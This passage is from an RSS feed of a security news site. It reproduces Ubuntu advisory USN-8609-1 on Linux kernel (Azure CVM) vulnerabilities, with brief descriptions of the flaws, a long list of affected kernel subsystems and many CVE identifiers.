CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8609-1: Linux kernel (Azure CVM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691495/unix-server/usn-8609-1-linux-kernel-azure-cvm-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691495/unix-server/usn-8609-1-linux-kernel-azure-cvm-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:37 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23220, CVE-2026-23221,
CVE-2026-23222, CVE-2026-23226, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23230, CVE-2026-23233, CVE-2026-23234,
CVE-2026-23235, CVE-2026-23236, CVE-2026-23237, CVE-2026-23238,
CVE-2026-23241, CVE-2026-23242, CVE-2026-23243, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23249, CVE-2026-23253,
CVE-2026-23255, CVE-2026-23266, CVE-2026-23267, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23272, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23278, CVE-2026-23279, CVE-2026-23281, CVE-2026-23284,
CVE-2026-23285, CVE-2026-23286, CVE-2026-23287, CVE-2026-23289,
CVE-2026-23290, CVE-2026-23291, CVE-2026-23292, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23302,
CVE-2026-23303, CVE-2026-23304, CVE-2026-23306, CVE-2026-23307,
CVE-2026-23308, CVE-2026-23310, CVE-2026-23312, CVE-2026-23313,
CVE-2026-23315, CVE-2026-23317, CVE-2026-23318, CVE-2026-23319,
CVE-2026-23321, CVE-2026-23324, CVE-2026-23325, CVE-2026-23330,
CVE-2026-23334, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23343, CVE-2026-23347, CVE-2026-23352,
CVE-2026-23356, CVE-2026-23357, CVE-2026-23359, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23392, CVE-2026-23395, CVE-2026-23396,
CVE-2026-23397, CVE-2026-23398, CVE-2026-23399, CVE-2026-23401,
CVE-2026-23412, CVE-2026-23413, CVE-2026-23414, CVE-2026-23418,
CVE-2026-23419, CVE-2026-23420, CVE-2026-23426, CVE-2026-23428,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23440,
CVE-2026-23441, CVE-2026-23442, CVE-2026-23444, CVE-2026-23446,
CVE-2026-23447, CVE-2026-23448, CVE-2026-23449, CVE-2026-23450,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31402, CVE-2026-31403, CVE-2026-31405, CVE-2026-31407,
CVE-2026-31408, CVE-2026-31409, CVE-2026-31411, CVE-2026-31412,
CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417,
CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423,
CVE-2026-31424, CVE-2026-31425, CVE-2026-31426, CVE-2026-31427,
CVE-2026-31428, CVE-2026-31429, CVE-2026-31430, CVE-2026-31432,
CVE-2026-31433, CVE-2026-31436, CVE-2026-31438, CVE-2026-31439,
CVE-2026-31440, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447,
CVE-2026-31448, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31478, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31607, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31615, CVE-2026-31616, CVE-2026-31617,
CVE-2026-31618, CVE-2026-31619, CVE-2026-31622, CVE-2026-31623,
CVE-2026-31624, CVE-2026-31625, CVE-2026-31626, CVE-2026-31627,
CVE-2026-31628, CVE-2026-31629, CVE-2026-31634, CVE-2026-31637,
CVE-2026-31638, CVE-2026-31639, CVE-2026-31642, CVE-2026-31645,
CVE-2026-31646, CVE-2026-31648, CVE-2026-31649, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31657, CVE-2026-31658,
CVE-2026-31659, CVE-2026-31660, CVE-2026-31661, CVE-2026-31662,
CVE-2026-31664, CVE-2026-31665, CVE-2026-31667, CVE-2026-31668,
CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31682, CVE-2026-31683, CVE-2026-31684, CVE-2026-31685,
CVE-2026-31686, CVE-2026-31687, CVE-2026-31689, CVE-2026-31693,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
